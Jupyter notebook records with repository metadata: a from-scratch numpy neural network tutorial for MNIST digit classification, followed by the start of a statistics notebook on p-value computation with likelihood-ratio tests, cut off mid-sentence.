[ [ "## Data Inspection\n\nBy now we have collected all the elements of the NN. Can we use this structure in order to solve the classification problem stated in the beginning? In order to answer this question we need first to get a better understanding of the data at our disposal. \n\nWe are trying to check whether NN is able to solve the classification problem using a collection of 70 000 handwritten numbers. Each of this handwritten number is represented as 28x28 image. \n\nThe original source of the data is \"THE MNIST DATABASE\". A detailed description of the dataset is available at\nhttp://yann.lecun.com/exdb/mnist/. 
There you can also find, for example, a summary of the performance results achieved by various classification algorithms.\n\nFor the sake of simplicity we suggest obtaining the data from another source:\nhttps://pjreddie.com/projects/mnist-in-csv/. Here the original images are saved in CSV, which allows to work with them directly.\n\nFor the purposes of demonstration below we use a smaller dataset (100 images), which will be expanded at a later stage.", "_____no_output_____" ] ], [ [ "# Load the data:\nraw_data = open(\"data/mnist_train_100.csv\", 'r') # \"r\" stands for \"read only\" mode.\ndata = raw_data.readlines() # read all the lines of a file in a list.\nraw_data.close() # remove temporal file from the environment in order to save memory.", "_____no_output_____" ], [ "# Inspect the data - check the number of observations:\nlen(data) # length of the object.", "_____no_output_____" ], [ "# Inspect a particular observation of the data:\ndata[0] # show observation number 0 from the list (remember that in Python numbering starts from 0).", "_____no_output_____" ] ], [ [ "* A particular observation looks like a string of 785 elements (label of the image + 784 elements for each pixels of a 28x28 image). 
\n* Each element representing a pixel is a number from 0 to 255 (from white to black color).\n* The first element in the line is the label of the image and therefore is a number from 0 to 9.\n\nUsing `matplotlib`, we can also reconstruct the original image based on the data about each pixel in the string.", "_____no_output_____" ] ], [ [ "# Load the package to plot the data:\nimport matplotlib.pyplot as mpp\n%matplotlib inline", "_____no_output_____" ], [ "# Plot the data:\nobservation = data[0].split(',') # break down observation number 0 (comma is used to identify each element).\nimage = np.asfarray(observation[1:]).reshape((28,28)) # take all the elements starting from the element 1 \n# (exclude element number 0, that corresponds to the label) and reshape them as an array with dimension 28 by 28.\nmpp.imshow(image, cmap='Blues', interpolation='None') # show the plot of this array using blue pallete.", "_____no_output_____" ], [ "# Save an observation of the data as an input to work with:\ninput = np.array(np.asfarray(observation[1:]), ndmin=2).T # save necessary elements in a vertical vector shape.", "_____no_output_____" ] ], [ [ "## Fitting the structure of the NN to the Data", "_____no_output_____" ], [ "Let's take a look once again at the NN's structure we have created at the beginning of the tutorial.", "_____no_output_____" ], [ "<img src=\"pics/neural_network1.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "After inspecting the data, we can conclude that the structure with 3-5-2 nodes is probably not optimal and therefore should be updated in order to fit the data we have and peculiarities of the classification problem: \n\n* For each observation we have 784 elements as an input (label element is excluded). Accordingly, instead of 3 input nodes we should better have 784. 
\n* Similarly, as we have 10 different options for the outcome (handwritten numbers are labeled from 0 to 9) the number of output nodes should be 10 instead of 2. \n* We also change the number of hidden nodes from 5 to 90. Such a number has been assigned based on some proportionality assumptions which will be checked later: 90 is 9 times higher than 10 and approximately 9 times smaller than 784.", "_____no_output_____" ] ], [ [ "# Determine the new structure of the NN:\ni_n = 784\nh_n = 90\no_n = 10", "_____no_output_____" ] ], [ [ "As we have new structure of the NN we should reassign the weights - now the size of each weight matrix will increase as we have more nodes in each layer.", "_____no_output_____" ] ], [ [ "# Determine the weights:\nw_i_h = np.random.rand(h_n, i_n)\nw_h_o = np.random.rand(o_n, h_n)", "_____no_output_____" ] ], [ [ "So far we have not used the first element of our observation - the label. It will be necessary to compare the predictions of the NN to the real state of the world and to train the NN to make correct predictions. The target should therefore have the same shape as the output layer of the NN, so that they could be comparable. We can represent the label as a vector of n binary (0 or 1) elements (n corresponds to the number of nodes in the output layer). 
There should be only one element equal to 1 and the position of this element should correspond to the index number of the label we want to predict.", "_____no_output_____" ] ], [ [ "# Create target array:\ntarget = np.array(np.zeros(o_n), ndmin=2).T\ntarget[int(observation[0])] = 1 # int() method returns an integer object from any number or string.", "_____no_output_____" ], [ "# Inspect how the target looks like (remember that the label of observations is 5):\ntarget", "_____no_output_____" ], [ "# Show the sizes of matrices of weights, input and target vectors:\nw_i_h.shape, input.shape, w_h_o.shape, target.shape", "_____no_output_____" ] ], [ [ "## Feedforwarding", "_____no_output_____" ], [ "Once we have the structure of the NN updated for the specific task of classifying the numbers depicted on the images, we can run our network in order to get some predictions that will be represented by a vector of 10 elements. This vector in its turn can be compared to the target.\n\nTo run the NN, i.e. to feed forward our input data in order to get some predictions, we should follow certain steps:\n\n1. Multiply an input vector by a matrix of weights that connects it with the next layer;\n2. Transform the result using activation function;\n3. Use the output obtained in the 2nd step as an input vector for the next layer.\n\nA sequence of these steps should be repeated n-1 times (where n corresponds to the number of layers). The output of the previous layer will always be the input vector for the next layer. In our case the procedure will happen twice.\n\nIn the picture below, you can see the procedure necessary to obtain the output of the hidden layer. The result of matrix multiplication here is called \"Hidden_Input\". 
Result of the transformation of \"Hidden_Input\" through activation function is called \"Hidden_Output\".\n\nThis output will be used as the input vector that should be multiplied by the next weight matrix and transformed through activation function in order to calculate the final output of the NN. If our NN would have more than one hidden layer, the procedure would be repeated more times.", "_____no_output_____" ], [ "<img src=\"pics/multiplication.png\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "<img src=\"pics/activation.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "Below you can see the code implementation of all the steps for all layers of the NN.", "_____no_output_____" ] ], [ [ "# Calculate the output of hidden and output layers of our NN:\nh_input = np.dot(w_i_h, input) # dot() performs matrix multiplication; \"h_input\" stands for \"Hidden_Input\".\nh_output = sigmoid(h_input) # \"Hidden_Output\" - result after activation function.\no_input = np.dot(w_h_o, h_output) # \"Output_Input\" - input used for the next layer.\no_output = sigmoid(o_input) # \"Output_Output\" - final output of the NN.", "_____no_output_____" ], [ "# Show intermediate data and output:\n# Uncomment the line of interest in order to see the the corresponding object.\n# h_input\n# h_output\n# o_input\no_output", "_____no_output_____" ] ], [ [ "## Data treatment good practices", "_____no_output_____" ], [ "Once we check the output of the NN and the results of each performed step, we can observe that already at the stage of the h_output all the data converts to a vector in which all the values are equal to 1. Such a vector does not provide us with any helpful insight. Apparently, something is wrong with what we have done so far. 
There could be several reasons for the problem we face.", "_____no_output_____" ], [ "**First of all, let's take a look at our sigmoid function once again:**", "_____no_output_____" ] ], [ [ "x = np.linspace(-10, 10, 100)\nplt.plot(x, sigmoid(x))\nplt.show()", "_____no_output_____" ] ], [ [ "As we can see the output of the sigmoid function will be almost identical once we feed a number bigger than 2. Similarly there is no significant difference between the outputs if numbers used are smaller than -2. Hence the application of sigmoid function to the original data leads to a loss of valuable information. The NN has problems learning something from the inputs, which are almost undifferentiable. \n\nOne solution is to transform the input we have. Ideally we should have our data in a range between 0 and 1. It is also desirable to avoid zeros as inputs, because the output of a zero input will always be zero, no matter how large the weights are, in which case the NN will not be able to use this input to learn.\n\nWe can perform a transformation of the original data as the one coded below:", "_____no_output_____" ] ], [ [ "# Good practice transformation of the input values:\ninput = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T \n# Our values in our input vector are in the range from 0 to 255. 
Therefore we should divide input vector by 255, \n# multiply it by 0,99 and add 0,01 in order to get values in the range from 0,01 to 1.\n\n# Good practice transformation of the target value:\ntarget = np.array(np.zeros(o_n) + 0.01, ndmin=2).T\ntarget[int(observation[0])] = 0.99", "_____no_output_____" ] ], [ [ "**Secondly, we can check our way to randomly assign initial weights:**", "_____no_output_____" ], [ "Let's take a look once at the function we used to randomly assign weights:", "_____no_output_____" ] ], [ [ "np.random.rand(3, 5)", "_____no_output_____" ] ], [ [ "As we can see, all the weights are positive, while the actual relationship between the features in the data and the values of the output vector can be negative. Hence, the way we employ to assign random weights should allow for negative weights too.\n\nBelow there are too alternatives how this can be implemented in Python.\n", "_____no_output_____" ] ], [ [ "# Good practice for initial weights assignment:\n \nalternative1 = np.random.rand(3, 5) - 0.5 \n# or\nalternative2 = np.random.normal(0.0, pow(3, -0.5), (3, 5)) \n# arguments: Mean of the distribution, Standard deviation of the distribution, Output shape.\n# Second approach is better as it takes in account the standard deviation \n# that is related to the number of incoming links into a node, 1/√(number of incoming links).\n\n# alternative1\nalternative2", "_____no_output_____" ], [ "# Define the weights in accordance with the best practice:\nw_i_h = np.random.normal(0.0, pow(h_n, -0.5), (h_n, i_n))\nw_h_o = np.random.normal(0.0, pow(o_n, -0.5), (o_n, h_n))", "_____no_output_____" ] ], [ [ "Now that we have all the elements assigned in accordance with good practices, we can feedforward the data once again.", "_____no_output_____" ] ], [ [ "# Run NN to get new classification of the particular observation:\nh_input = np.dot(w_i_h, input)\nh_output = sigmoid(h_input)\no_input = np.dot(w_h_o, h_output)\no_output = sigmoid(o_input)\no_output", 
"_____no_output_____" ] ], [ [ "## First evaluation of the results", "_____no_output_____" ], [ "Once we have obtained the output of the NN, we can compare it to the target.", "_____no_output_____" ] ], [ [ "# Calculate the errors of the classification:\no_errors = target - o_output\no_errors", "_____no_output_____" ] ], [ [ "The result we would like to achieve should look like a vector of values where almost all values are negligibly small except for the one value that has the position in the vector corresponding to the index of the true label. \n\nIt is not the case now. Nevertheless one should remember that so far all the weights have been assigned randomly and no training has been performed yet. In any case, it is not a vector of ones anymore, which is an improvement.\n\nThus, we can proceed to the next stage, which is to find out where the errors come from and how they can be minimized.", "_____no_output_____" ], [ "## Backpropagation", "_____no_output_____" ], [ "Back propagation is a learning algorithm which aims to minimize the errors/cost function of the NN. Through this learning algorithm, the random weights and biases which were initially given to the network will be optimized to give the best output.", "_____no_output_____" ], [ "Output of each node is the sum of the multiplications of the output of previous nodes by certain weights. Therefore we can associate how much error is coming with every weight and how much error has been brought from each particular node from the previous layer.", "_____no_output_____" ], [ "To understand this better it is worth imagining the following example:\n* node 1 in the output layer of the NN should be equal to 0,01 ;\n* instead the NN is providing us with 0,8.\n\nIn this case we should do the following:\n\n1. Calculate the error of the node (-0,79 in our example);\n\n2. 
Calculate how much error has been brought by every link to this node.\n\nFor instance if weight w<sub>11</sub> is 0,6 and w<sub>21</sub> is 0,4 then they are associated with an error of -0,79 multiplied by 0,6 and -0,79 multiplied by 0,4 respectively (see Pictures below).", "_____no_output_____" ], [ "<img src=\"pics/bp.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "After calculation of how much error is associated with every weight we can obtain the errors for the nodes in the proceeding layer.\n\nFor instance error term for node 1 in the hidden layer will be equal to:\n\nthe sum of errors associated with all the weights (w<sub>11</sub> and w<sub>12</sub> in our case) that link this node with the next layer. (see Picture above).", "_____no_output_____" ], [ "Once we repeat this procedure for all the nodes in all layers we can find out how much every node should be changed.\n\nTo do so in Python we just need to make multiplication of vector that contain errors by corresponding matrix of weights.", "_____no_output_____" ] ], [ [ "# Find the errors associated with hidden layer output:\nh_errors = np.dot(w_h_o.T, o_errors)\nh_errors[0:10] # errors in the hidden layer - show the first 10 nodes out of 90.", "_____no_output_____" ] ], [ [ "## Gradient descent", "_____no_output_____" ], [ "Gradient descent is one the most popular algorithms to optimize the neural networks. The name gradient descent is rooted in the procedure where the gradient is repeatedly evaluated to update the parameters. The objective of the gradient descent is to find weight parameters that will minimize the cost function.", "_____no_output_____" ], [ "To understand the concept of gradient descent we should ask ourselves the following question: What can be done to improve the weights we have assigned randomly at the beginning, so that the overall result improves? \n\nTo change the output of any node we should change the weights that connect it with the previous layer. 
Basically we want to find out how much error in every node changes once we change associated weights. Next we want to select the weights that would lead to a minimal error in the output layer. That can be achieved by differentiation of the cost function and search for its minimum.\n\nGiven multidimensionality of the function, which we need to differentiate, the search for its minimum can be a complicated task. This task is similar to some extent to the search of the path in the darkness from the top of a mountain to its valley. Because it is dark it is almost impossible to reach the valley immediately. The only way to achieve the goal is by exploring the neighbourhood (the radius you are able to see) and taking small steps in the direction that leads downhill and constantly updating the path for the next steps. This process is illustrated below:", "_____no_output_____" ] ], [ [ "%%html\n<iframe src=\"https://giphy.com/embed/8tvzvXhB3wcmI\" width=\"1000\" height=\"400\" frameBorder=\"0\" class=\"giphy-embed\" allowFullScreen></iframe>\n<p><a href=\"https://giphy.com/gifs/deep-learning-8tvzvXhB3wcmI\">[Source: Giphy.com]</a></p>", "_____no_output_____" ] ], [ [ "Mathematically the differentiation process can be illustrated on the example of weights between output and hidden layers (w<sub>ho</sub>). The same process but with corresponding values should be applied for the weights between input and hidden layers (w<sub>ih</sub>).\n\nAs it can be seen from the formulas below the error we want to minimize (E) can be defined as the sum of squared differences between the target (t<sub>n</sub>) and output (o<sub>n</sub>) values of the NN. The sum of differences for all the nodes in the layer is relevant but when doing calculation for a particular node this sum can be omitted - only the difference between particular output (o<sub>o</sub>) and target (t<sub>o</sub>) matters.\n\nTarget value is constant. 
Output value depends on weights and is obtained after applying sigmoid function to the sum of inputs (outputs of the previous layer - o<sub>h</sub>) multiplied by corresponding weights (w<sub>ho</sub>).", "_____no_output_____" ], [ "<img src=\"pics/formula2.png\" alt=\"Drawing\" style=\"width: 1000px;\"/>", "_____no_output_____" ], [ "The formula for derivative of the sigmoid function is provided below. It is necessary to keep in mind that the sum to which we apply sigmoid function also depends on the change of weights (w<sub>ho</sub>). Therefore one should follow the chain rule for derivation.", "_____no_output_____" ], [ "<img src=\"pics/formula3.png\" alt=\"Drawing\" style=\"width: 1000px;\"/>", "_____no_output_____" ], [ "The formula we derive is for one particular node. We can however apply it to all the nodes in the layer. In order to do so the only thing we need is to consider this formula in matrix notation. Thus, necessary update of weights linked to all the nodes in a layer will be calculated.\n\nAfter solving the minimization problem we can update the weights we have assigned before.", "_____no_output_____" ], [ "<img src=\"pics/formula5.png\" alt=\"Drawing\" style=\"width: 1000px;\"/>", "_____no_output_____" ], [ "In code this can be represented as follows:", "_____no_output_____" ] ], [ [ "# Update the matrix for weights between hidden and output layers:\nw_h_o += np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n# Update the matrix for weights between input and hidden layers:\nw_i_h += np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))", "_____no_output_____" ] ], [ [ "## Learning Rate", "_____no_output_____" ], [ "Now, there is something else, we should add in the weights updating procedure. If we completely change our weights with every new observation - our model learns to predict only the last input. 
Instead of updating weights 100 % every time we can change them only partially - this way every new observation will bring some new knowledge while the previous one will still be in memory even though updated to certain extent. The bigger the learning rate the more importance has the last observation, the smaller it is the more important is all the previous knowledge. The smaller the steps - the more accurate will be the prediction. At the same time it might take more time to learn.", "_____no_output_____" ], [ "<img src=\"pics/learning_rate.png\" alt=\"Drawing\" style=\"width: 600px;\"/> [Source: \"Business Analytics & Data Science Course by Professor S. Lessmann, Chapter 5:\nArtificial Neural Networks\"]", "_____no_output_____" ], [ "Below is the code for weight's update procedure with learning rate included.", "_____no_output_____" ] ], [ [ "# Define the learning rate:\nl_r = 0.3\n\n# Update the weights for the links between the hidden and output layers:\nw_h_o += l_r * np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n# Update the weights for the links between the input and hidden layers:\nw_i_h += l_r * np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))", "_____no_output_____" ] ], [ [ "## Training", "_____no_output_____" ], [ "So far we have been working with one particular observation. Let's put all the steps done before in a for-loop, so that we can perform them for all observations in our training set. More observations will allow the NN to learn from more information. 
Every time a new observation is feedforwarded, the error term backpropagated and the cost function minimized, the matrices of weights become more capable to label yet unknown observations.", "_____no_output_____" ] ], [ [ "for i in data:\n observation = i.split(',')\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n target = np.array(np.zeros(o_n) + 0.01, ndmin=2).T\n target[int(observation[0])] = 0.99\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n o_errors = target - o_output\n h_errors = np.dot(w_h_o.T, o_errors)\n \n w_h_o += l_r * np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n w_i_h += l_r * np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))\n\n pass", "_____no_output_____" ] ], [ [ "## Second evaluation of the results", "_____no_output_____" ], [ "Once we have trained the model with 100 observations we can test it with new data it has never seen. After loading the test set we can first work with a particular observation to get an intuition about how good our NN can solve considered classification problem. 
", "_____no_output_____" ] ], [ [ "# Load the mnist test data CSV file:\nraw_data_test = open(\"data/mnist_test.csv\", 'r')\ndata_test = raw_data_test.readlines()\nraw_data_test.close()", "_____no_output_____" ], [ "# Check a particular observation:\nobservation = data_test[0].split(',')\n# Print the label:\nprint(observation[0])\n# Image the number:\nimage = np.asfarray(observation[1:]).reshape((28,28))\nmpp.imshow(image, cmap='Blues', interpolation='None')", "7\n" ], [ "# Use this observation as an input and run NN with it:\ninput = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\nh_input = np.dot(w_i_h, input)\nh_output = sigmoid(h_input)\no_input = np.dot(w_h_o, h_output)\no_output = sigmoid(o_input)\n\no_output", "_____no_output_____" ], [ "# Get the prediction of NN for this test observation:\nlabel = np.argmax(o_output)\nlabel", "_____no_output_____" ] ], [ [ "After working with a particular observation from the testset we can label all of them and evaluate the accuracy of our NN.", "_____no_output_____" ] ], [ [ "# Test the neural network using all test dataset:\n\nscore = [] # create a list in which the predictions of the network will we saved.\n\n# Go through all the observations in the test data set:\nfor i in data_test:\n observation = i.split(',')\n expected = int(observation[0])\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n label = np.argmax(o_output)\n\n if (label == expected):\n score.append(1)\n else:\n score.append(0)\n pass\n \n pass", "_____no_output_____" ], [ "# Calculate the performance score, the fraction of correct answers:\nscore_array = np.asarray(score)\nprint (\"performance = \", score_array.sum() / score_array.size)", "performance = 0.4363\n" ] ], [ [ "It is several times better than naive, which would be 0.1 (given that we have 10 levels of the 
categorical variable we have to classify). Can we do better?", "_____no_output_____" ], [ "## Further Improvements", "_____no_output_____" ], [ "**Training with several epochs**", "_____no_output_____" ], [ "One way to improve the results of the NN is to train it more. For instance we can feedforward the same 100 observations more than once. Despite the fact that these are the same observations, longer training allows NN to accumulate more knowledge. Keep in mind that due to the presence of a learning rate NN receives only part of the information that is available and useful to predict particular observation. Seeing the same observations several times leads to smaller loss of the data.", "_____no_output_____" ], [ "So let's introduce one extra parameter called \"epochs\" and create a loop around the number of epochs. The rest of the code we see below is the same as before.", "_____no_output_____" ] ], [ [ "epochs = 5", "_____no_output_____" ], [ "# The \"big loop\" with epochs:\nfor e in range(epochs):\n for i in data:\n observation = i.split(',')\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n target = np.array(np.zeros(o_n) + 0.01, ndmin=2).T\n target[int(observation[0])] = 0.99\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n o_errors = target - o_output\n h_errors = np.dot(w_h_o.T, o_errors)\n w_h_o += l_r * np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n w_i_h += l_r * np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))\n\n pass\n pass\n\n\n# test\nscore = []\n\nfor i in data_test:\n observation = i.split(',')\n correct_label = int(observation[0])\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n label = np.argmax(o_output)\n if (label 
== correct_label):\n score.append(1)\n else:\n score.append(0)\n pass\n \n pass\n\n\n# calculate accuracy\nscore_array = np.asarray(score)\nprint (\"performance = \", score_array.sum() / score_array.size)", "performance = 0.6904\n" ] ], [ [ "** Training with other l_r**", "_____no_output_____" ], [ "The smaller the learning rate the more capable the network to optimize the weights in a more accurate way. At the same time one should keep in mind that small l_r also means additional loss of information extracted from each particular observation. Hence, there should be many training observations available in order to make the trade-off between accuracy and usage of available data reasonable. Given that we have more epochs now, it is interesting to try a smaller learning rate.", "_____no_output_____" ] ], [ [ "l_r = 0.1\n\n# run the \"big loop\" with epochs again to get measure accuracy for new settings.", "_____no_output_____" ] ], [ [ "**A more complicated structure**", "_____no_output_____" ], [ "As you may remember in the beginning we have assigned the number of nodes in the hidden layer based on some rule of thumb assumptions. Now we can test if the NN will perform better if we increase the number of hidden nodes.", "_____no_output_____" ] ], [ [ "h_n = 150\n\n# Determine the weights for a bigger matrices\nw_i_h = np.random.normal(0.0, pow(h_n, -0.5), (h_n, i_n))\nw_h_o = np.random.normal(0.0, pow(o_n, -0.5), (o_n, h_n))\n\n# run the \"big loop\" with epochs again to get measure accuracy for new settings.", "_____no_output_____" ] ], [ [ "It is always possible to train neural networks where the number of neurons is larger. But, with a smaller number of neurons the neural network has much better generalization abilities. 
\n\n**Overfitting.** Too many nodes is one of the reasons that leads to a problem when the neural network is overtrained which would mean that it will fail to recognize patterns which were never used in the training.\n\nWith a smaller number of neurons, it is more complicated to train the network to very small errors, but it may produce much better approximations for new patterns. The most common mistake made by many researchers is that in order to speed up the training process and to reduce the training errors, they use neural networks with a larger number of neurons than required. Such networks could perform poorly for new patterns not seen previously by the NN.", "_____no_output_____" ], [ "**Other training set**", "_____no_output_____" ], [ "One other source of improvement is providing the NN with a relatively big dataset for training. Everything that was done before was implemented with just 100 observations. Let's see if our results improve if we increase our training dataset to 60 000 observations. As we have more data now we will reduce the number of epochs and keep a low learning rate.", "_____no_output_____" ] ], [ [ "# Load the data\nraw_data = open(\"data/mnist_train.csv\", 'r')\ndata = raw_data.readlines()\nraw_data.close()\n\n# Settings\nepochs = 2\nl_r = 0.1\nh_n = 90\nw_i_h = np.random.normal(0.0, pow(h_n, -0.5), (h_n, i_n))\nw_h_o = np.random.normal(0.0, pow(o_n, -0.5), (o_n, h_n))\n\n# run the \"big loop\" with epochs again to measure accuracy for new settings", "_____no_output_____" ] ], [ [ "The result we achieve with a big training set is already pretty impressive. In more than 90 % of cases our NN is able to solve the classification problem properly. And we should remember that it was implemented from scratch using only basic linear algebra packages. 
Let's see in the following section \"Replicate with Keras\" if we can do better or if we can simplify the process using specialized packages to build neural networks.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ] ]
e72df90c97d6d3adc857fa5eb83759faa264a94e
48,541
ipynb
Jupyter Notebook
p-value conversion.ipynb
HDembinski/essays
a3070c10c6ca2a9c4b24eb89cba5ec5518e085dd
[ "MIT" ]
17
2020-04-07T07:29:46.000Z
2022-03-04T18:09:31.000Z
p-value conversion.ipynb
HDembinski/essays
a3070c10c6ca2a9c4b24eb89cba5ec5518e085dd
[ "MIT" ]
8
2020-04-08T11:31:52.000Z
2022-01-25T02:01:34.000Z
p-value conversion.ipynb
HDembinski/essays
a3070c10c6ca2a9c4b24eb89cba5ec5518e085dd
[ "MIT" ]
3
2020-05-16T14:35:06.000Z
2022-03-01T05:53:21.000Z
144.898507
30,840
0.872191
[ [ [ "# p-value computation and conversion: one-sided, two-sided?\n\nThis is an attempt to clear up the confusion around p-value computation and based on the authorative source on that matter:\n\n[G. Cowan, K. Cranmer, E. Gross, O. Vitells, Eur.Phys.J.C 71 (2011) 1554](https://inspirehep.net/literature/860907)\n\nThe point of that paper is that one should use two different test statistics based on the likelihood-ratio for deviations that are always positive and for deviations where the sign is not known a priori. One gets two different p-values accordingly. The conversion to significance is then always the same.\n\nI generate a flat distribution from $(-1,1)$ which represents background-only samples, then I fit a Gaussian peak centered at 0 with width 0.1 to this data test the two hypotheses\n\n* $H_0$: there is only background\n* $H_1$: there is background and a signal\n\nThe $H_1$ in these kinds of tests is never arbitrary in terms of the signal, we do not seek for any deviation, but a rather specific one. In our example, we seek for a signal in particular location (here centered at 0). This is important for the computation of the p-value later. The less constrained $H_1$ is, the more of the Look-Elsewhere Effect I get, because more random fluctuations of the background can be confused with a signal.\n\nWhen fitting the toys, I allow the amplitude $\\mu$ of the signal to be positive or negative (following Cowan et al.). As a test statistic for a deviation from the background-only case I use $t_0$ (again following Cowan et al. 
in the notation)\n$$\nt_0 = -2\\ln \\lambda(0) = -2 \\ln \\frac{L(0, \\hat {\\hat \\theta})}{L(\\hat \\mu, \\hat \\theta)}\n$$\nwhere\n* $\\mu$ is the amplitude of the hypothetical signal\n* $\\theta$ are nuisance parameters\n* $\\hat \\mu$ is the fitted value of $\\mu$\n* $\\hat\\theta$ are the fitted values of $\\theta$ when $\\mu$ is also fitted\n* $\\hat{\\hat\\theta}$ are the fitted values of $\\theta$ under the condition $\\mu = 0$.\n\nIf you search for $t_0$ in the paper, it is not explicitly written there, $t_0$ is $t_\\mu$ from section 2.1 with $\\mu = 0$.", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom iminuit import Minuit\nfrom iminuit.cost import ExtendedUnbinnedNLL\nfrom numba_stats import uniform_pdf, norm_pdf\nimport matplotlib.pyplot as plt\nimport boost_histogram as bh", "_____no_output_____" ], [ "rng = np.random.default_rng(1)\n\ndef model(x, mu, theta):\n return mu + theta, mu * norm_pdf(x, 0, 0.1) + theta * uniform_pdf(x, -1, 2)\n\npositive = [0]\nnegative = [0]\nt0 = []\nmu = []\nfor imc in range(1000):\n b = rng.uniform(-1, 1, size=1000)\n c = ExtendedUnbinnedNLL(b, model)\n m = Minuit(c, mu=0, theta=len(b))\n m.limits[\"theta\"] = (0, None)\n m.fixed[\"mu\"] = True\n m.migrad()\n assert m.valid\n lnL_b = -m.fval\n m.fixed[\"mu\"] = False\n m.migrad()\n mui = m.values[\"mu\"]\n lnL_sb = -m.fval\n t0i = 2 * (lnL_sb - lnL_b)\n t0.append(t0i)\n mu.append(mui)\n if mui > 0 and t0i > positive[0]:\n h = bh.Histogram(bh.axis.Regular(100, -1, 1))\n h.fill(b)\n positive = (t0i, h, m.values[:], m.covariance[:])\n elif mui < 0 and t0i > negative[0]:\n h = bh.Histogram(bh.axis.Regular(100, -1, 1))\n h.fill(b)\n negative = (t0i, h, m.values[:], m.covariance[:])\n \nt0 = np.array(t0)\nmu = np.array(mu)", "_____no_output_____" ] ], [ [ "Let's look at the two most extreme deviations from $H_0$, the ones with the largest and smallest signal.", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots(1, 2, figsize=(14, 5), sharex=True, 
sharey=True)\nfor (t0i, h, par, cov), axi in zip((negative, positive), ax):\n plt.sca(axi)\n scale = 1/h.axes[0].widths\n plt.errorbar(h.axes[0].centers, h.values() * scale, h.variances()**0.5 * scale, fmt=\"ok\", label=\"data\")\n scale = 1 / h.axes[0].widths\n xm = np.linspace(-1, 1)\n plt.plot(xm, model(xm, *par)[1], label=\"fit\")\n plt.legend()\n dev = par[0] / cov[0,0] ** 0.5\n plt.title(f\"$\\mu = {par[0]:.1f}$ $t_0 = {t0i:.2f}$\")\n plt.ylabel(\"density\")\n plt.xlabel(\"$x$\")", "_____no_output_____" ] ], [ [ "Both upward and downward fluctuations are unlikely events if $H_0$ is true and therefore both get a large value of our test statistic $t_0$, which does not know in which way the deviation went.\n\n#### Searches with $\\mu > 0$ (for a new particle, new decay mode, etc.)\n\nIn most cases we look for a positive peak (new particle, new decay mode, etc). If we see a downward fluctuation, we **know for sure** that this cannot be what we are looking for. Therefore, when we compute the p-value for some observation from a simulation like this one, we must not regard large values of the test statistic when the fluctuation was negative, since this is not a deviation of $H_0$ that mimics our signal. Instead we should set $t_0$ to zero in such cases. Cowan et al. 
